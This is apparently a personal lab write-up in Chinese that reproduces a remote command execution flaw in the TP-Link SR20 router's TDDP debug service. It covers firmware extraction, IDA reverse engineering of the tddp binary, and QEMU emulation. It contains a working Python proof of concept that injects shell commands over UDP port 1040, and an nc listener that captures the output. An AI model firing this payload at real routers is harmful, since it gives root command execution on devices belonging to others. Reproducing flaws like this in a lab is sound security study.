最近看到合天网安实验室上线的TP-Link sr20本地网络远程命令执行漏洞复现的实验,就跟着实验指导书跑了一下,就顺便在自己的虚拟机上搭环境复现一遍,水一篇笔记好了(搭环境真是太折磨人了or2
实验在ubuntu18.04下完成
tddp协议
tddp协议是一个TP-Link申请过专利的调试协议基于udp协议,有v1,v2两个版本,可以从从官网下载存在漏洞的v1-180518版本固件”SR20(US)_V1_180518.zip”
TP-Link SR20 设备运行了 V1 版本的 TDDP 协议,V1 版本无需认证,只需往 SR20 设备的 UDP 1040 端口发送数据,且数据的第二字节为
0x31
时,SR20 设备会连接发送该请求设备的 TFTP 服务下载相应的文件并使用 LUA 解释器以 root 权限来执行,这就导致存在远程代码执行漏洞
环境准备
qemu
可以使用apt install qemu
直接安装
或者从官网下载最新版
wget https://download.qemu.org/qemu-3.1.0.tar.xz # 下载源码
tar xvJf qemu-3.1.0.tar.xz #解压源码压缩包
cd qemu-3.1.0 # 进入源码目录
./configure --target-list=arm-softmmu --audio-drv-list=
# 编译前配置,只编译ARM版的QEMU来加快编译速度
make
下载时出现了错误
ERROR: pixman >= 0.21.8 not present.
$apt-cache search pixman
libpixman-1-0 - pixel-manipulation library for X and cairo
libpixman-1-dev - pixel-manipulation library for X and cairo (development files)
$apt-get install libpixman-1-dev
安装pixman解决
编译完成后安装 checkinstall 来生成 deb 包
sudo apt-get install checkinstall # 安装 checkinstall
sudo checkinstall make install # 使用 checkinstall 生成 deb 包并安装
如果不使用 checkinstall,直接sudo make install
的会把 qemu 安装在多个位置,如果发生错误不方便删除,所以使用 checkinstall 生成 deb 包方便安装和卸载。
binwalk
sudo apt install git
git clone https://github.com/ReFirmLabs/binwalk
cd binwalk
python setup.py install
sudo ./deps.sh # Debian/Ubuntu 系统用户可以直接使用 deps.sh 脚本安装所有的依赖
PS: 本人在最后一步运行
deps.sh
安装依赖的时cramfstools
编译出错导致安装失败,如果你也遇到这个问题,不必理会,因为针对本文讲述的漏洞,这个包并不需要安装
我也遇到了cramfs-tools
安装失败的问题,但是既然不影响,就不管它
nmap
apt-get install nmap
poc.py
这里还是使用合天网安的poc
from pwn import *
from socket import *
import sys
tddp_port = 1040
recv_port = 12345
ip = sys.argv[1]
command = sys.argv[2]
s_send = socket(AF_INET,SOCK_DGRAM,0)
s_recv = socket(AF_INET,SOCK_DGRAM,0)
s_recv.bind(('',12345))
payload = '\x01\x31'.ljust(12,'\x00')
payload += "123|%s&&echo ;123"%(command)
s_send.sendto(payload,(ip,tddp_port))
s_send.close()
res,addr = s_recv.recvfrom(1024)
print res
实验
获取文件
将固件解压
unzip 'SR20(us)_v1_180518.zip'
使用binwalk提取固件中的文件系统
binwalk -Me tpra_sr20v1_us-up-ver1-2-1-P522_20180518-rel77140_2018-05-21_08.42.04.bin
提取出来的squashfs-root就是固件的文件系统
进入文件系统中使用find命令查找存在漏洞的tddp文件
find ./ -name tddp
file命令查看tddp文件类型
file ./usr/bin/tddp
可以看到这是arm架构32位小端elf文件
ida分析文件
将tddp文件放在ida中分析,打开字符串窗口
查找关键字符串”cmd”
双击跳转查看交叉引用列表一遍可以发现.rodata:00019398 0000001F C [%s():%d] TDDPv2: Special cmd\n
之后的字符串都被同一个函数调用
随便双击跳转到一个字符串,按x查看交叉引用函数
点击”OK”跳转到引用字符串的函数
f5查看伪代码,进入函数sub_15e74
中
漏洞点在函数sub_9c24
中,在switch的case 0xa
分支
进入sub_9c24
继续跟进sub_91dc
- 我们知道32位系统的函数调用是将参数从右往左压栈,而栈是从高地址往低地址增长,所以在栈上保存参数的最低地址处保存的就是第一个参数,也就是图中的a1,而
void va_start(va_list ap, last_arg)
函数可以将last_arg用于初始化va_list类型变量ap,让它指向可变参数表里面的第一个参数,利用最后一个入栈的参数的指针来获取其余的参数,这种传参办法再printf、scanf、等函数中经常见到 int vsprintf(char *str, const char *format, va_list arg)
则将a1中的内容经过arg附加参数中指定的值替换,并按需求进行格式化,保存到str中- fork函数会创建一个子进程,在子进程中会返回0,而在父进程中则返回子进程的ID,所以这里用来判断子进程还是父进程从而执行不同的操作
在子进程这里有个execve系统调用,双击argv查看栈空间
可以看到v4,v5,v6都在argv的高地址处
而这里的v4
其实是作为字符串”-c”的地址
相当于实现下面这个小demo的系统调用,即以s字符串为路径运行一个新的进程
#include<unistd.h>
int main(void){
char *s;
char *envp[]={0,NULL};
char *argv[]={"sh","-c",s, NULL};
execve("/bin/sh",argv,envp);
return 0;
}
fork + execve 也是一般实现执行新进程的方式
而这里的s是经过处理以后的sub_91dc
函数的第一个参数a1,也就是说只要我们能控制a1,就能实现命令执行
但是这里sub_91dc
函数的a1参数是固定的
查看sub_91dc
函数的交叉引用列表
有一个sub_a580
函数,发现sub_a580
函数也在sub_15E74
函数的swtch的case 0x31
分支中被调用
进入sub_a580
函数,可以看到在调用sub_91dc
之前,调用了一个sscanf
函数
int sscanf(const char *buffer,const char*format,[argument ]...);
函数用于从buffer中检索数据,依照format的格式将数据写入到argument里,也就是字符串v21经过检索后将字符串保存到字符串s中,后面又将s按”%s”格式接入”cd……“字符串中作为第一个参数调用sub_91dc
这里用正则表达式过滤了’;’,关于正则表达式的知识可以看这里
往前找v21是怎么来的
在第31行看到,v21是v10的地址往后45083字节,而在第23行看到v10就是sub_a580
函数的参数a1
回到sub_15e74
函数,可以看到sub_a580
函数的参数是v8,而v8就是sub_15e74
函数的参数a1
查看sub_15e74
函数的交叉引用列表
跳转到sub_16418
,可以看到sub_15e74
函数第一个参数是v16
而在34行,recvfrom函数中使用了v16
ssize_t recvfrom(int sockfd,void *buf,size_t len,unsigned int flags, struct sockaddr *from,socket_t *fromlen);
recvfrom()用来接收远程主机经指定的socket传来的数据,并把数据传到由参数buf指向的内存空间,参数len为可接收数据的最大长度.参数flags一般设0,其他数值定义参考recv().参数from用来指定欲传送的网络地址,结构sockaddr请参考bind()函数.参数fromlen为sockaddr的结构长度.
对应着32行代码,可知v14+45083就是原型中的buf,用于接收socket传来的数据。那么就定位到源头了,既然是从socket接收的,那么就是我们可控的。
而这里调用的recvfrom函数中,buf参数就是v14+45083,也就是说接收到的数据储存在v14+45083地址处
现在的函数调用关系是
sub_16418
->sub_15e74
->sub_a580
->sub_91dc
每个函数的第一个参数a1都是上一个函数的第一个参数a1,直到sub_16418
函数中的v16
而在sub_15e74
函数中的swtch条件变量是a1[45084]
而在sub_A580
函数中的v21和v15都是v10+45083
也就是说,如果构造payload前两个字节是”\0x1\0x31”,就可以只让v21指针后移12位,再被sscanf函数检索、再作为后面sub_91DC
函数的参数
所以只要在payload中再填充12位的字符
payload = '\x01\x31'.ljust(12,'\x00')
然后就是我们要注入的代码
payload += "123|%s&&echo ;123"%(command)
就可以执行command变量中的命令
上图中需要注意分号;之后还需要填充字符,因为在使用sscanf函数进行分割后会判断分号后面的内容是否为空
qemu模拟实验环境
从debian官网下载模拟时需要用到的Debian ARM 系统的三个文件
vmlinuz-3.2.0-4-vexpress 2013-09-20 18:33 1.9M
debian_wheezy_armhf_standard.qcow2 2013-12-17 00:04 229M
initrd.img-3.2.0-4-vexpress 2013-12-17 01:57 2.2M
把三个文件放在同一个目录下
使用tunctl命令添加一个虚拟网卡,用于与虚拟机通信
apt install uml-utilities
tunctl -t tap1 -u root
使用ifconfig命令为添加的网卡配置IP地址
apt install net-tools
ifconfig tap1 10.10.20.1/24
启动qemu
qemu-system-arm -M vexpress-a9 -kernel vmlinuz-3.2.0-4-vexpress -initrd initrd.img-3.2.0-4-vexpress -drive if=sd,file=debian_wheezy_armhf_standard.qcow2 -append "root=/dev/mmcblk0p2 console=ttyAMA0" -net nic -net tap,ifname=tap1,script=no,downscript=no -nographic
用户名/密码 = root/root
进入虚拟机
查看ip地址
可以看到还没有分配ip地址,debian系统里手动分配ip地址
ifconfig eth0 10.10.20.2/24
此时debian系统里什么也没有,打开一个shell,用scp命令将文件系统上传到debian系统
scp -r /root/Desktop/router/tplinksr20/_tpra_sr20v1_us-up-ver1-2-1-P522_20180518-rel77140_2018-05-21_08.42.04.bin.extracted/squashfs-root root@10.10.20.2:/root/
可以在debian系统看到上传成功了
使用chroot切换根目录固件文件系统
这里注意,使用 chroot后,系统读取的是新根下的目录和文件,也就是固件的目录和文件。
chroot 默认不会切换 /dev 和 /proc, 因此切换根目录前需要先挂载这两个目录
mount -o bind /dev ./squashfs-root/dev/
mount -t proc /proc/ ./squashfs-root/proc/
chroot ./squashfs-root/ sh
这样就切换根目录为文件系统的根目录了
debian系统里输入tddp启动服务
tddp
在ubuntu用nmap 10.10.20.2
命令扫描debian系统并不能扫到tddp对应的1040端口,可以用下面的命令
nmap -p 1040 -sU 10.10.20.2
可以看到1040端口是打开的
运行poc.py,后面分别是debian的ip以及要执行的命令,但是执行后回显是在debian上的
python poc.py 10.10.20.2 date
在debian上可以看到命令执行后的效果
可以通过nc将结果回显在本地
再打开一个shell,nc -nvl 10.10.20.1 6666
监听6666端口,debian系统重新打开tddp
执行poc脚本
回显到监听窗口,成功复现
查找资料的过程中发现还有一种利用lua的思路,但是太菜没学过web,就没仔细研究
参考资料: